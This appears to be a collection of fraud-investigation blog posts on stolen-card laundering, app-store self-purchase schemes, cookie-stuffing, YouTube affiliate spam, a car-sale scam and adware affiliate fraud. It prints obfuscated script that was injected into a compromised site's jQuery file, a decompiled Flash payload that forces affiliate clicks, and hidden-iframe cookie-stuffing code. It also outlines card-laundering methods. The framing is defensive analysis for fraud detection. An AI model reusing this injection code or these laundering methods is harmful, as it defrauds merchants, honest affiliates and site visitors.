Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

United States American Express $7.00
United States Discover $8.00
United States Visa & Mastercard $4.50
Europe American Express $12.50
Europe Discover $18.00
Europe Visa & Mastercard $14.50
Asia American Express $18.00
Asia Discover $18.00
Asia Visa & Mastercard $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam but scammers are lazy and this sounds like too much work. Mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in and by the time it starts any meaningful income then the account on A could get closed at any time (buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605″) yields a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0  ebay-writer-1ebay-writer-2Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry) which can then be sold for sale at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on their weakest links in the ecosystem

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.com is going to result in a request www.52zhishi.com/v.swf which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to 52zhishi.com come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
 
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowdomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new number(loader.data["safe"]);
            url1 = new string(loader.data["url1"]);
            url2 = new string(loader.data["url2"]);
            url3 = new string(loader.data["url3"]);
            url4 = new string(loader.data["url4"]);
            url5 = new string(loader.data["url5"]);
            url6 = new string(loader.data["url6"]);
            url7 = new string(loader.data["url7"]);
            url8 = new string(loader.data["url8"]);
            url9 = new string(loader.data["url9"]);
            url10 = new string(loader.data["url10"]);
            url11 = new string(loader.data["url11"]);
            url12 = new string(loader.data["url12"]);
            url13 = new string(loader.data["url13"]);
            url14 = new string(loader.data["url14"]);
            url15 = new string(loader.data["url15"]);
            url16 = new string(loader.data["url16"]);
            url17 = new string(loader.data["url17"]);
            url18 = new string(loader.data["url18"]);
            url19 = new string(loader.data["url19"]);
            url20 = new string(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. world of tanks affiliate fraudNote the following:

  • Commission rate of “$2.65″/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

world of tanks affiliate fraud This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. Tinyurl redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154 which then uses Javascript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full screen iframe which contains www.mb57.com which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&amp;c=63867&amp;a=105565&amp;s1=tanks
  5. This URl redirects to track.popmog.com which redirects to worldoftanks.com

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

YouTube Spam

By Wesley Brandi in CPL | Spam - (1 Comment)

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); We consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T into N”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting youtube.com. This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

youtube spam sample setThere are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:youtube spam

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:

youtube_spam_comment_1

This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page: goo.gl\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse goo.gl/nb1Bak in a browser:

  • goo.gl is Google’s URL Shortener.
  • goo.gl\nb1Bak redirects to 78.154.146.129/~leechtv/paidsurveys/?7 which redirects to trk.surveyjunkie.com/srd/klenzxcp
  • This then redirects to www.surveyjunkie.com

“So surveyjunkie.com is the spammer?”

No, surveyjunkie.com is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), he is paid a finder’s fee when YouTube users sign up with surveyjunkie.com.

Now this may or may not violate surveyjunkie’s acceptable terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to trk.surveyjunkie.com does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to surveyjunkie.com via two affiliates (klenzxcp and gqrzv5sx):

youtube spam leads to surveyjunkieModus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it  routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is att.com . I dynamically modified the page to show the att.com page that was hidden, follow the red arrow below

wirelesscouponcode_affiliate_fraud_1

 

As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing

 

Upon casual inspection, bestpcantivirus.com reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

affiliate fraud

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, bestpcantivirus.com is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.

affiliate_fraud_norton_3

Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. affiliate fraudI dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:
    Merchant CJ Affiliate Id
    AVG 5727502
    Eset 3840211
    F-Secure 3840211
    Kaspersky 5727502
    Pandasecurity 5727502
    Zonealarm 3840211

Recall that the Bargain Hunter scam is a four pronged attack:

1. Scammer Sets the Trap

This cars.com ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582.

cars.com scam through amazon payments

It’s a pretty good deal, designed to whet my appetite and have me get in touch with the seller thinking that there’s a great deal here, i.e., it’s an entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (jessica.hale2011@gmail.com)
Subject: Cars.com used car lead for Juanna - 2002 Toyota Tacoma‏

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 
inspection.

More pics attached here:

http://s1151.photobucket.com/albums/o629/sammy23r23/

The Photobucket link shows pictures of the car that are not available in the original cars.com ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon right? So of course I will send money to them and then wait for delivery, if not for any other reason than they always deliver no matter what. Doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (jessica.hale2011@gmail.com)
Subject: Cars.com used car lead for Juanna - 2002 Toyota Tacoma‏

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon

cars.com and amazon payment fraudThe Amazon email actually comes from a Live account: Amazon FPS (support.fps@live.com)

4. Victim Sends Money

Once I send the money through Money Gram then it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon but they won’t know what I’m talking about (obviously because they were never involved)

I give this scammer 1/10:

- 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

So sad to think that sooner or later the scammer behind this ad is going to catch another victim, he wouldn’t be doing this otherwise.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the cafepress.co.uk site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Cafepress.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is stat_mn.inc.php which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Cafepress records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Cafepress site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the Webroot site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Webroot.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is stat_mn.inc.php which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Webroot records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Webroot site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

It is particularly striking to see Webroot, a company specializing in computer security, tricked by Incredibar adware — software that Webroot security software removes from users’ computers.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.

Co-authored with Ben Edelman

On a computer running Zango adware, our crawler browses the oldnavy.gap.com site.  Zango sees this traffic and opens a window to surveysclick.com (packet trace).  Surveysclick.com returns tricky redirects and eventually does a POST through to a CJ click link with publisher ID 7115795, then on to Gap.  As shown in the screenshot, the user ends up with two Gap windows — the underlying window where the user had begun, and a second window opened by Zango adware.

affiliate fraud
If a user subsequently makes a purchase from either window, then CJ and Gap records will credit affiliate 7115795 with purportedly causing that purchase.  But in fact the user was already at the Gap site before the Zango adware and this affiliate 7115795 intervened.  They did nothing to cause or encourage the user’s purchase, and in fact they affirmatively interfered with the purchase by interrupting the user with a popup.  Any payments to this affiliate are entirely wasted.